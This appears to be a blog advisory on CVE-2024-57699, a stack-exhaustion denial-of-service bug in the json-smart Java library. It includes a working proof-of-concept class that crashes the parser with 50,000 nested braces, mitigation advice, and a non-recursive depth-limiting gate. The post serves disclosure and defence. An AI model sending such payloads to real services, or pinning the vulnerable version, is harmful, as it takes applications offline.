In early 2024, security researchers found a critical bug in Netplex Json-smart, a popular Java library for parsing JSON. This bug, tracked as CVE-2024-57699, could let attackers crash your server or app in seconds just by sending a carefully designed JSON payload. Let’s break down what’s going on, why it happened, and how you can test (and protect) your own applications.
The Problem: Stack Exhaustion via Evil JSON
A bug was reported in Json-smart, versions 2.5.0 through 2.5.1. The flaw is triggered when the parser is asked to process JSON containing a huge number of '{' characters. Each opening brace starts another nested parse call, so the parser recurses without limit and quickly uses up the Java runtime's stack space.
Result: Your server thread crashes with a StackOverflowError. If your system isn’t prepared for this, it gets vulnerable to a Denial of Service (DoS) attack.
Why Did This Happen? The Incomplete Fix
There was an earlier related bug, CVE-2023-1370, fixed by the Netplex developers. But their patch didn't fully solve the problem: attackers found a new way to trigger stack exhaustion using slightly different JSON payloads.
The attacker builds a JSON string that consists of nothing but opening braces, `{{{{{{{{{{{{{{{{...`, and so on, with thousands or even millions of them. When JSONParser tries to parse it, each nesting level adds new frames to the call stack until the JVM can't allocate any more.
> Note: The size required depends on your JVM stack configuration, but even moderate nesting can crash the process.
Maven dependency for Json-smart

```xml
<dependency>
    <groupId>net.minidev</groupId>
    <artifactId>json-smart</artifactId>
    <version>2.5.0</version>
</dependency>
```
Java code to trigger the bug

```java
import net.minidev.json.parser.JSONParser;

public class JsonSmartDosExploit {
    public static void main(String[] args) throws Exception {
        StringBuilder evilJson = new StringBuilder();
        // Add, for example, 50,000 '{' characters
        for (int i = 0; i < 50000; i++) {
            evilJson.append('{');
        }
        JSONParser parser = new JSONParser(JSONParser.DEFAULT_PERMISSIVE_MODE);
        try {
            // Each '{' recurses one level deeper; the vulnerable versions never stop.
            parser.parse(evilJson.toString());
        } catch (Throwable t) {
            // StackOverflowError is an Error, not an Exception, so catch Throwable.
            System.out.println("Crash! " + t);
        }
    }
}
```

Expected output

```text
Crash! java.lang.StackOverflowError
```
Impact: Easy DoS for Any JSON API
If you're using Json-smart 2.5.0 or 2.5.1 to power your Java API or web service, an attacker can submit a POST/PUT request carrying one of these malformed JSON inputs. The server thread parsing that request will immediately crash. If you're running with a thread pool, all threads can get knocked out, taking down your service.
References and More Details
- GitHub Security Advisory from Netplex
- Debian security tracker
- OSS index entry for CVE-2024-57699
How Can You Fix or Mitigate This?
- Update library: upgrade to the latest json-smart release, where this bug is fixed (see the GitHub Security Advisory in the references above).
- Input limits: As a backup, implement incoming JSON size limits and reject deeply-nested JSON structures before passing to the parser.
- Monitoring: Use custom uncaught exception handlers to catch and log StackOverflowError in your JSON endpoints.
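One way to implement the size and depth limits above, as an added example that is not code from the json-smart project or from the original post: a pre-parser gate that scans the raw JSON text once, with no recursion, and rejects it before any recursive parser sees it. The class name `JsonNestingGate`, the limits `MAX_BYTES` and `MAX_DEPTH`, and the sample documents are assumptions.

```java
import java.nio.charset.StandardCharsets;

/**
 * Hypothetical pre-parser gate (added example, not part of json-smart).
 * Enforces a byte-size limit and a nesting-depth limit on raw JSON text
 * before it is handed to a recursive parser such as JSONParser.
 */
public final class JsonNestingGate {

    /** Constructed limits; tune them to the payloads your API legitimately accepts. */
    public static final int MAX_BYTES = 1_000_000;
    public static final int MAX_DEPTH = 64;

    public static final class RejectedJsonException extends Exception {
        public RejectedJsonException(String msg) { super(msg); }
    }

    /**
     * Returns the maximum nesting depth of '{' / '[' in the text, ignoring
     * brackets that appear inside JSON string literals (escapes handled).
     * Runs in O(n) time with O(1) stack, so it cannot itself be exhausted
     * by deep input, and it stops at the first '{' that exceeds MAX_DEPTH
     * instead of scanning the rest of the payload.
     */
    public static int check(String json) throws RejectedJsonException {
        if (json.getBytes(StandardCharsets.UTF_8).length > MAX_BYTES) {
            throw new RejectedJsonException("payload exceeds " + MAX_BYTES + " bytes");
        }
        int depth = 0, maxDepth = 0;
        boolean inString = false, escaped = false;
        for (int i = 0; i < json.length(); i++) {
            char c = json.charAt(i);
            if (inString) {
                if (escaped)        { escaped = false; }
                else if (c == '\\') { escaped = true; }
                else if (c == '"')  { inString = false; }
                continue;
            }
            switch (c) {
                case '"':
                    inString = true;
                    break;
                case '{':
                case '[':
                    depth++;
                    if (depth > MAX_DEPTH) {
                        throw new RejectedJsonException("nesting depth exceeds " + MAX_DEPTH);
                    }
                    if (depth > maxDepth) { maxDepth = depth; }
                    break;
                case '}':
                case ']':
                    // Unbalanced closers are left for the real parser to reject.
                    if (depth > 0) { depth--; }
                    break;
                default:
                    break;
            }
        }
        return maxDepth;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs: a normal document (note the '{' inside a
        // string, which must not count) and the all-braces payload from above.
        String normal = "{\"user\":{\"name\":\"a{b\",\"tags\":[[1,2],[3]]}}";
        System.out.println("normal document accepted, depth = " + check(normal));

        StringBuilder evil = new StringBuilder();
        for (int i = 0; i < 50000; i++) { evil.append('{'); }
        try {
            check(evil.toString());
            System.out.println("unexpected: payload accepted");
        } catch (RejectedJsonException e) {
            System.out.println("rejected before parsing: " + e.getMessage());
        }
    }
}
```

Call `JsonNestingGate.check(body)` on the request body before `parser.parse(body)`; only text that passes the gate reaches the recursive parser, so the 50,000-brace payload is turned away at depth 65 without a single parser frame being pushed. In a real service the byte limit belongs on the input stream (or the web framework's max-body-size setting) so the payload is never fully buffered, and the uncaught-exception handler from the monitoring item stays as a last-resort logger rather than the primary defence, because a StackOverflowError can leave the thread and any partially updated state in an unknown condition.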
Conclusion
CVE-2024-57699 looks simple, but it’s a reminder that even tiny bugs in widely-used libraries can threaten the reliability of your applications. If you rely on Netplex Json-smart for parsing user data, it’s urgent you update now—or risk seeing your app knocked offline with a single evil request.
*Stay secure, and always treat your input as hostile!*
Exclusive Content for Readers:
If you want a copy-paste-ready exploit or detection script for your CI/CD pipelines, reach out or comment below. Stay tuned for more breakdowns of recent Java ecosystem CVEs!
Timeline
Published on: 02/05/2025 22:15:33 UTC
Last modified on: 02/06/2025 16:15:41 UTC